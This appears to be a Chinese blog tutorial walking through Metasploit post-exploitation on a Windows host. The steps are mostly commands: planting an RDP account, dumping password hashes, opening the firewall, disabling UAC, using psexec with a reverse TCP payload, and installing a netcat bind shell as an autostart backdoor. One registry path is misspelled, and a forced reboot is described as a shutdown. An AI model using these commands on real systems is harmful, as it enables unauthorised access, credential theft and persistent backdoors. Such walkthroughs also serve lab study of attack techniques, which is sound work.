一、第二次启动msf

第二次启动msf可以直接使用msfconsole命令

1
msfconsole

按上次的操作选用攻击工具进入meterpreter界面

二、植入账号密码

使用run post/windows/manage/enable_rdp USERNAME=liz PASSWORD=123456向目标机植入账号密码

1
run post/windows/manage/enable_rdp USERNAME=liz PASSWORD=123456

此处因为已经植入过,所以会出现[-]报错

此时可以开另一个终端输入rdesktop + 目标主机ip,以此远程连接目标机桌面

1
rdesktop <目标主机ip>

使用hashdump查询目标机所有加密后的账号密码,这里需要找到我们自己添加的那个账号的密码

1
hashdump

三、进入shell获取进一步权限

输入shell获取目标机权限(相当于在终端骇入目标机)

1
shell

乱码可以输入:chcp 65001解决乱码

1
chcp 65001

并输入netsh firewall add portopening TCP 4444 "liz" ENABLE ALL关闭目标机防火墙

1
netsh firewall add portopening TCP 4444 "liz" ENABLE ALL

输入下面的命令关闭目标主机的UAC

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVerion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

UAC概述:用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果

1
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVerion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

输入下面的命令允许本地管理员账户在远程连接时拥有完整权限

cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

1
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

输入命令exit退出,正常流程一般需要退出三次,看到退出至meterpreter界面即可

1
exit

四、上传后门程序

输入background后出现session字样即退回攻击工具界面

1
background

使用另一个攻击工具use exploit/windows/smb/psexecshow options

先设置payload:set payload windows/meterpreter/reverse_tcp

1
2
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp

设置好RHOST、SMBUSER、SMBPASS、SMBDOMAIN分别为目标主机ip,先前植入的用户名,与利用hashdump查出的加密后的植入的密码,和WORKGROUP,然后run运行

1
2
3
4
set RHOST <目标主机ip>
set SMBUSER <先前植入的用户名>
set SMBPASS <hashdump查出的加密后的植入的密码>
set SMBDOMAIN WORKGROUP

如果写错了,可以使用unset <输入错的项>来撤销输入

运行成功,上传后门程序upload /usr/share/windows-binaries/nc.exe C:\\windows

1
upload /usr/share/windows-binaries/nc.exe C:\\windows

此处因为已向目标主机植入过后门程序,所以提示文件被占用

设置目标主机开机自启动后门程序 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

1
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'

此时再输入shutdown –r –f –t 0,即可使目标机直接关机

1
shutdown –r –f –t 0